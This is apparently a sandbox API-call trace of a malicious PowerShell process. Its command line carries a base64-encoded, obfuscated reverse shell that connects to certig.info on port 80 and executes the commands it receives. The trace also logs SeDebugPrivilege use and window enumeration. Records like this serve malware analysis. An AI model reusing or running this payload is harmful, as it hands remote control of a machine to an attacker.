	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFAAYgBIAEsAQQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABZAFEARwBYAGcAPQAoACQAUABiAEgASwBBAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABkAFIAZgB3AFYAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABUAEwAZgBHAG8APQAkAFkAUQBHAFgAZwAuAFIAZQBhAGQAKAAkAGQAUgBmAHcAVgAsADAALAAkAGQAUgBmAHcAVgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAEwAZABEAG4AQQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABSAGYAdwBWACwAMAAsACQAVABMAGYARwBvACkAOwAkAE4ARQB4AEcAUgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQATABkAEQAbgBBACAAMgA+ACYAMQApACkAOwAkAFkAUQBHAFgAZwAuAFcAcgBpAHQAZQAoACQATgBFAHgARwBSACwAMAAsACQATgBFAHgARwBSAC4ATABlAG4AZwB0AGgAKQA7ACQAWQBRAEcAWABnAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABQAGIASABLAEEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUABiAEgASwBBAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 147
	os_tid = 0x320

	[0127.413] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0128.303] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0128.303] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0128.303] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0128.303] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0130.605] GetVersionExW (in: lpVersionInformation=0x14daa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14daa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0130.608] GetVersionExW (in: lpVersionInformation=0x14daa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14daa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0130.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.620] GetVersionExW (in: lpVersionInformation=0x14d810*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d810*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0130.621] SetErrorMode (uMode=0x1) returned 0x1
	[0130.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d970 | out: lpFileInformation=0x14d970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0130.624] SetErrorMode (uMode=0x1) returned 0x1
	[0130.629] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dbe0 | out: lpdwHandle=0x14dbe0) returned 0x94c
	[0130.631] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d27d40 | out: lpData=0x2d27d40) returned 1
	[0130.635] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14db58, puLen=0x14db50 | out: lplpBuffer=0x14db58*=0x2d27ddc, puLen=0x14db50) returned 1
	[0130.748] lstrlenW (lpString="䅁") returned 1
	[0130.760] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d27eb8, puLen=0x14dac0) returned 1
	[0130.761] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0130.764] CoTaskMemAlloc (cb=0x2e) returned 0x254b50
	[0130.764] lstrcpyW (in: lpString1=0x254b50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0130.765] CoTaskMemFree (pv=0x254b50) 
	[0130.765] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d27f0c, puLen=0x14dac0) returned 1
	[0130.765] lstrlenW (lpString="System.Management.Automation") returned 28
	[0130.765] CoTaskMemAlloc (cb=0x3c) returned 0x258970
	[0130.765] lstrcpyW (in: lpString1=0x258970, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0130.765] CoTaskMemFree (pv=0x258970) 
	[0130.765] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d27f68, puLen=0x14dac0) returned 1
	[0130.765] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0130.765] CoTaskMemAlloc (cb=0x20) returned 0x25e2e0
	[0130.765] lstrcpyW (in: lpString1=0x25e2e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0130.765] CoTaskMemFree (pv=0x25e2e0) 
	[0130.765] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d27fa8, puLen=0x14dac0) returned 1
	[0130.765] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0130.765] CoTaskMemAlloc (cb=0x44) returned 0x258970
	[0130.765] lstrcpyW (in: lpString1=0x258970, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0130.766] CoTaskMemFree (pv=0x258970) 
	[0130.766] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d28010, puLen=0x14dac0) returned 1
	[0130.766] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0130.766] CoTaskMemAlloc (cb=0x76) returned 0x1d39b0
	[0130.766] lstrcpyW (in: lpString1=0x1d39b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0130.766] CoTaskMemFree (pv=0x1d39b0) 
	[0130.766] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d280ac, puLen=0x14dac0) returned 1
	[0130.766] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0130.766] CoTaskMemAlloc (cb=0x44) returned 0x258970
	[0130.766] lstrcpyW (in: lpString1=0x258970, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0130.766] CoTaskMemFree (pv=0x258970) 
	[0130.766] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d28110, puLen=0x14dac0) returned 1
	[0130.766] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0130.766] CoTaskMemAlloc (cb=0x58) returned 0x19af60
	[0130.766] lstrcpyW (in: lpString1=0x19af60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0130.766] CoTaskMemFree (pv=0x19af60) 
	[0130.766] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d2818c, puLen=0x14dac0) returned 1
	[0130.766] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0130.766] CoTaskMemAlloc (cb=0x20) returned 0x25e2e0
	[0130.766] lstrcpyW (in: lpString1=0x25e2e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0130.766] CoTaskMemFree (pv=0x25e2e0) 
	[0130.766] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2d27e34, puLen=0x14dac0) returned 1
	[0130.767] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0130.767] CoTaskMemAlloc (cb=0x66) returned 0x1bf710
	[0130.767] lstrcpyW (in: lpString1=0x1bf710, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0130.767] CoTaskMemFree (pv=0x1bf710) 
	[0130.767] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x0, puLen=0x14dac0) returned 0
	[0130.767] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x0, puLen=0x14dac0) returned 0
	[0130.767] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x0, puLen=0x14dac0) returned 0
	[0130.767] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14da98, puLen=0x14da90 | out: lplpBuffer=0x14da98*=0x2d27ddc, puLen=0x14da90) returned 1
	[0130.768] CoTaskMemAlloc (cb=0x204) returned 0x19f0c0
	[0130.768] VerLanguageNameW (in: wLang=0x0, szLang=0x19f0c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0130.770] CoTaskMemFree (pv=0x19f0c0) 
	[0130.770] VerQueryValueW (in: pBlock=0x2d27d40, lpSubBlock="\\", lplpBuffer=0x14dae8, puLen=0x14dae0 | out: lplpBuffer=0x14dae8*=0x2d27d68, puLen=0x14dae0) returned 1
	[0130.778] GetCurrentProcessId () returned 0xaa0
	[0130.886] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14ca10 | out: lpLuid=0x14ca10*(LowPart=0x14, HighPart=0)) returned 1
	[0130.889] GetCurrentProcess () returned 0xffffffffffffffff
	[0130.890] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14ca30 | out: TokenHandle=0x14ca30*=0x2fc) returned 1
	[0130.891] AdjustTokenPrivileges (in: TokenHandle=0x2fc, DisableAllPrivileges=0, NewState=0x2d2b5b8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0130.893] CloseHandle (hObject=0x2fc) returned 1
	[0130.898] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa0) returned 0x2fc
	[0130.913] EnumProcessModules (in: hProcess=0x2fc, lphModule=0x2d2b620, cb=0x200, lpcbNeeded=0x14da48 | out: lphModule=0x2d2b620, lpcbNeeded=0x14da48) returned 1
	[0130.916] GetModuleInformation (in: hProcess=0x2fc, hModule=0x13f600000, lpmodinfo=0x2d2b890, cb=0x18 | out: lpmodinfo=0x2d2b890*(lpBaseOfDll=0x13f600000, SizeOfImage=0x77000, EntryPoint=0x13f60c63c)) returned 1
	[0130.918] CoTaskMemAlloc (cb=0x804) returned 0x25f510
	[0130.918] GetModuleBaseNameW (in: hProcess=0x2fc, hModule=0x13f600000, lpBaseName=0x25f510, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0130.918] CoTaskMemFree (pv=0x25f510) 
	[0130.919] CoTaskMemAlloc (cb=0x804) returned 0x25f510
	[0130.919] GetModuleFileNameExW (in: hProcess=0x2fc, hModule=0x13f600000, lpFilename=0x25f510, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0130.919] CoTaskMemFree (pv=0x25f510) 
	[0130.920] CloseHandle (hObject=0x2fc) returned 1
	[0130.930] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xaa0) returned 0x2fc
	[0131.029] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x14db78 | out: lpExitCode=0x14db78*=0x103) returned 1
	[0131.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b088, Length=0x20000, ResultLength=0x14db40 | out: SystemInformation=0x12d2b088, ResultLength=0x14db40*=0x13c20) returned 0x0
	[0131.057] EnumWindows (lpEnumFunc=0x2b066ac, lParam=0x0) returned 1
	[0131.058] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.058] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.058] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.058] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.058] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x538
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.059] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x514
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x778
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x778
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.060] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.060] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xa18
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x978
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x838
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xb2c
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8d4
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x874
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9a8
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xb40
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xa00
	[0131.061] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9f0
	[0131.062] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9e0
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9d0
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9c0
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9b0
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9a0
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x990
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x980
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x970
	[0131.063] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x960
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x950
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x940
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x930
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x920
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x910
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x900
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8f0
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8e0
	[0131.064] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8d0
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8c0
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8b0
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8a0
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x890
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x880
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x870
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x860
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x850
	[0131.065] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x840
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x830
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x820
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x810
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x20c
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7c4
